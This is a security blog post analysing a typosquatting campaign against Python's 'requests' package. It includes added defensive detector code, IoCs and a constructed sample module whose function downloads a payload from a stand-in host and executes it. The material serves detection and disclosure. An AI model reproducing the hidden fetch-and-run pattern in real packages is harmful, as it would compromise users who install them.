Typosquatting Attack on ‘requests’, One of the Most Popular Python Packages

Jossef Harush Kadouri
Published in checkmarx-security, May 31, 2022


Python’s requests package is the unofficial champion when it comes to performing HTTP requests. While many third-party packages try to make HTTP requests easier, requests offers by far one of the best user experiences out there, with nearly 50,000,000 weekly installations.

Attack

On May 31, at 09:29:11, Checkmarx’s automated package analysis technology reported suspicious activity with multiple red flags. Tal Folkman, a senior security researcher in Checkmarx’s Supply Chain Security (SCS) research team, verified the malicious activity and revealed a multi-technique campaign, which was reported to PyPI’s security team less than one hour after the attack was launched.

Techniques

As defenders, we see many attackers. One thing we can say for sure is that these attackers keep evolving and improving their techniques.

Typosquatting

This technique relies on human typing mistakes, and in this case it is very clear that the attacker used it, given the multiple near-identical permutations of the ‘requests’ package name.
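One way a defender can catch these permutations before installation is to compare every name in a requirements file against a list of well-known packages and flag anything within a small edit distance that is not an exact match. The following is an added example, not code from the original post; the popular-package list and the sample requirements file are constructed for the example, and the typo names "requets" and "requesst" are invented rather than taken from the campaign.

```python
# Added example, not code from the original post: flag names in a requirements
# file that sit within a small edit distance of a well-known package without being
# that package. The popular-package list below is constructed for the example; a
# real check would load a much larger list of top PyPI projects.
import re

POPULAR_PACKAGES = {"requests", "urllib3", "numpy", "django", "flask"}  # constructed


def normalize(name: str) -> str:
    """PEP 503 name normalisation: case-insensitive, '-', '_' and '.' are equivalent."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a: str, b: str) -> int:
    """Edit distance counting insertions, deletions and substitutions."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution
        prev = cur
    return prev[-1]


def typosquat_candidates(requested: str, popular=POPULAR_PACKAGES, max_distance: int = 2):
    """Return [(popular_name, distance), ...] for near-misses; [] for an exact match."""
    req = normalize(requested)
    hits = []
    for known in popular:
        k = normalize(known)
        if req == k:
            return []            # the real package, nothing to flag
        d = levenshtein(req, k)
        if d <= max_distance:
            hits.append((known, d))
    return sorted(hits, key=lambda t: (t[1], t[0]))


def audit_requirements(text: str) -> dict:
    """Map each suspicious requirement name to its near-miss popular packages."""
    findings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        # strip version specifiers, extras and environment markers
        name = re.split(r"[<>=!~\[; ]", line, maxsplit=1)[0]
        hits = typosquat_candidates(name)
        if hits:
            findings[name] = hits
    return findings


if __name__ == "__main__":
    sample = "requests==2.28.1\nrequets\nrequesst>=1.0  # typo\nnumpy\n"  # constructed
    for pkg, near in audit_requirements(sample).items():
        print(f"{pkg}: looks like {near}")
```

The check is deliberately conservative: an exact match against a known package is never flagged, so the real ‘requests’ passes while one-character slips are reported together with the package they resemble.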

StarJacking

For those of you who haven’t heard about StarJacking, check out this blog post.

In this attack, the original ‘requests’ GitHub repository was named as the repository of the malicious packages, making them look highly popular and reliable.

[Image: usage of the StarJacking technique in this attack]

Execution Upon Usage

The malicious payload is tricky: it launches only upon usage, meaning you must import the malicious package and call it in order to invoke the malicious code. In my opinion this was done to evade security scanners that blindly install a package to see what happens, without actually using it.
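A scanner that only installs or imports a package will miss code that runs inside a function. The following is an added example, not code from the original post: a static pass over a module’s source that reports suspicious calls and whether they execute at import time (module top level) or only when one of the package’s functions is used. The sample module source is constructed for the example and is not the real malicious code.

```python
# Added example, not code from the original post: a static pass that separates
# suspicious calls executed at import time (module top level) from calls that only
# run when a function of the package is used. The sample package source below is
# constructed for the example and is not the real malicious code.
import ast

# Calls worth a second look inside a package that claims to be an HTTP client.
SUSPICIOUS_CALLS = {
    "subprocess.Popen", "subprocess.run", "subprocess.call", "os.system",
    "urllib.request.urlretrieve", "urllib.request.urlopen",
}


def dotted_name(node):
    """'a.b.c' for Name/Attribute chains, None for anything else (e.g. a call result)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


class SuspiciousCallFinder(ast.NodeVisitor):
    def __init__(self):
        self.enclosing = []      # names of the functions we are currently inside
        self.findings = []       # (call, line, "on_import" | "on_use:<func>")

    def visit_FunctionDef(self, node):
        self.enclosing.append(node.name)
        self.generic_visit(node)
        self.enclosing.pop()

    visit_AsyncFunctionDef = visit_FunctionDef

    def visit_Call(self, node):
        name = dotted_name(node.func)
        if name in SUSPICIOUS_CALLS:
            where = "on_use:" + ".".join(self.enclosing) if self.enclosing else "on_import"
            self.findings.append((name, node.lineno, where))
        self.generic_visit(node)


def classify_suspicious_calls(source: str):
    """Parse Python source and return every suspicious call with where it would run."""
    finder = SuspiciousCallFinder()
    finder.visit(ast.parse(source))
    return finder.findings


# Constructed sample: a module whose public function looks like the real API but
# fetches and starts a binary only when called, so an install-only sandbox sees nothing.
SAMPLE_MODULE = '''
import subprocess, urllib.request

def get(url, **kwargs):
    urllib.request.urlretrieve("https://example.invalid/payload.tgz", "/tmp/payload.tgz")
    subprocess.Popen(["/tmp/payload/bin"])
    return _real_get(url, **kwargs)
'''

if __name__ == "__main__":
    for call, line, where in classify_suspicious_calls(SAMPLE_MODULE):
        print(f"line {line}: {call} runs {where}")
```

Findings tagged `on_use:<function>` are exactly the ones an install-and-observe sandbox never triggers; a dynamic analysis that wants to see them has to exercise the package’s public API, not just import it.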

Disposable Account

The PyPI account OrangeAlice is clearly fake. It was created on May 27th and contains a total of 11 packages: 1 test package and 10 typosquatting attempts.

The attacker who published those packages stated in the package metadata that their email is “me@kennethreitz.org”, an unverified lie, as this email actually belongs to the maintainer of the original requests package, Kenneth Reitz.
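Both the StarJacking section above and this borrowed maintainer email come down to the same defender check: does a candidate package’s declared metadata belong to a different, legitimate project? The following is an added example, not code from the original post, that compares two records shaped like the `info` object of PyPI’s JSON API. The repository URL and email are the real project’s, but the records themselves and the candidate name "requets" are constructed for the example rather than fetched from PyPI.

```python
# Added example, not code from the original post: compare a candidate package's
# PyPI metadata against the legitimate package it resembles. The dictionaries mirror
# the shape of the "info" object in PyPI's JSON API, but both records and the
# candidate name "requets" are constructed for the example.
import re
from urllib.parse import urlparse


def normalize(name: str) -> str:
    """PEP 503 normalisation so 'Requests' and 'requests' compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def repo_slug(url):
    """'owner/repo' for a GitHub URL, None for anything else."""
    if not url:
        return None
    parsed = urlparse(url)
    if parsed.netloc.lower() not in ("github.com", "www.github.com"):
        return None
    parts = [p for p in parsed.path.split("/") if p]
    if len(parts) < 2:
        return None
    repo = parts[1][:-4] if parts[1].endswith(".git") else parts[1]
    return f"{parts[0]}/{repo}".lower()


def declared_repos(info: dict) -> set:
    """Every GitHub repository the package points at via home_page or project_urls."""
    urls = [info.get("home_page")] + list((info.get("project_urls") or {}).values())
    return {slug for slug in map(repo_slug, urls) if slug}


def metadata_red_flags(candidate: dict, reference: dict) -> list:
    """Red flags that the candidate is impersonating the reference package."""
    flags = []
    if normalize(candidate["name"]) == normalize(reference["name"]):
        return flags                         # same project, nothing to compare
    cand_repos = declared_repos(candidate)
    if cand_repos & declared_repos(reference):
        flags.append(f"starjacking: declares the repository of {reference['name']}")
    for slug in sorted(cand_repos):
        if normalize(slug.split("/")[1]) != normalize(candidate["name"]):
            flags.append(f"declared repository {slug} does not match package name")
    cand_mail = (candidate.get("author_email") or "").lower()
    if cand_mail and cand_mail == (reference.get("author_email") or "").lower():
        flags.append(f"author email identical to the {reference['name']} maintainer")
    return flags


# Constructed records: the repository URL and email are the real project's, but
# these dictionaries were not fetched from PyPI.
REFERENCE = {
    "name": "requests",
    "home_page": "https://requests.readthedocs.io",
    "project_urls": {"Source": "https://github.com/psf/requests"},
    "author_email": "me@kennethreitz.org",
}
CANDIDATE = {
    "name": "requets",
    "home_page": "https://github.com/psf/requests",
    "project_urls": {},
    "author_email": "me@kennethreitz.org",
}

if __name__ == "__main__":
    for flag in metadata_red_flags(CANDIDATE, REFERENCE):
        print("RED FLAG:", flag)
```

None of these fields is verified by the index, so the check treats them as claims to be cross-referenced rather than as proof of origin; a name that differs while the repository and maintainer email match is the signature of a borrowed identity.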

The Impact

Crypto Miner

The malicious code, once executed, downloads an open source cryptominer called “xmrig”, version 6.17.0, from the official project’s release page on GitHub: https://github.com/xmrig/xmrig

[Image: xmrig payload on VirusTotal]

Once the software is downloaded and extracted, it is executed as a subprocess and provided with the attacker’s wallet address to collect the funds.

By checking the attacker’s wallet on https://supportxmr.com/ we saw that it has already gained some traffic.

Hostname Exfiltration

In addition, the attacker sends the victim’s hostname to an application hosted on serene-springs-50769[.]herokuapp[.]com.
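The domain, wallet address and miner name above are directly usable as detection content. The following is an added example, not code from the original post, that matches those indicators against DNS and process-creation log lines; the log lines are constructed for the example, and only the domain, wallet address and miner name come from the post.

```python
# Added example, not code from the original post: match the post's IoCs against
# DNS and process-creation log lines. The log lines are constructed for the example;
# only the domain, wallet address and miner name come from the post.
import re

IOC_DOMAINS = {"serene-springs-50769[.]herokuapp[.]com"}   # defanged, as published
IOC_WALLETS = {"44ZptWtXxVhjLYGz8oKCMSW6nA9Gpc2RVYQDzyBnaM7VZkaCTGZGEANQTR3pNXK3mzZq1cVzKs1SA3H4Wibc6qVvG5xpcSY"}
MINER_NAMES = {"xmrig"}


def refang(indicator: str) -> str:
    """Turn the published 'a[.]b' form back into a matchable hostname."""
    return indicator.replace("[.]", ".")


def scan_line(line: str) -> list:
    """All (indicator_type, indicator) pairs present in one log line."""
    hits = []
    lowered = line.lower()
    for domain in IOC_DOMAINS:
        if refang(domain) in lowered:
            hits.append(("c2_domain", domain))
    for wallet in IOC_WALLETS:
        if wallet in line:                      # wallet addresses are case-sensitive
            hits.append(("miner_wallet", wallet))
    for name in MINER_NAMES:
        if re.search(rf"\b{re.escape(name)}\b", lowered):
            hits.append(("miner_binary", name))
    return hits


def scan_log(lines) -> list:
    """(line_number, hits) for every line carrying at least one indicator."""
    results = []
    for number, line in enumerate(lines, 1):
        hits = scan_line(line)
        if hits:
            results.append((number, hits))
    return results


# Constructed log lines in a loose Sysmon-like style.
SAMPLE_LOG = [
    "2022-05-31T09:30:02Z DnsQuery host=build-agent-7 query=serene-springs-50769.herokuapp.com",
    "2022-05-31T09:30:03Z ProcessCreate host=build-agent-7 image=/tmp/xmrig-6.17.0/xmrig "
    "cmdline=\"xmrig 44ZptWtXxVhjLYGz8oKCMSW6nA9Gpc2RVYQDzyBnaM7VZkaCTGZGEANQTR3pNXK3mzZq1cVzKs1SA3H4Wibc6qVvG5xpcSY\"",
    "2022-05-31T09:30:04Z DnsQuery host=build-agent-7 query=pypi.org",
]

if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG):
        print(f"line {number}: " + ", ".join(f"{kind}={value}" for kind, value in hits))
```

The hostname lookup and the process start are the two observable events this campaign leaves on a victim host, so a DNS query for the Heroku application or a process whose image or command line carries the miner name or wallet is the point to alert on.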

Conclusion

‘requests’ is one of the most popular Python packages, and a typosquatting attack on it can cause significant damage. This time the damage took the form of a cryptominer.

We have reported all packages to PyPI and are working with them to block the attack as soon as possible. Please exercise caution until the malicious packages are removed.

Package Names

IOCs

  • serene-springs-50769[.]herokuapp[.]com
  • 44ZptWtXxVhjLYGz8oKCMSW6nA9Gpc2RVYQDzyBnaM7VZkaCTGZGEANQTR3pNXK3mzZq1cVzKs1SA3H4Wibc6qVvG5xpcSY

Checkmarx Got Your Back!

Customers of Checkmarx are safe, as our ahead-of-time cloud analysis technology, seamlessly integrated with the Checkmarx SCA solution, alerts on such accidental installations of malicious packages before they are shipped forward.


Founder of dusti.co and zeronetworks.com. Writing about: Attackers, Software Supply Chain Security, and Malware Analysis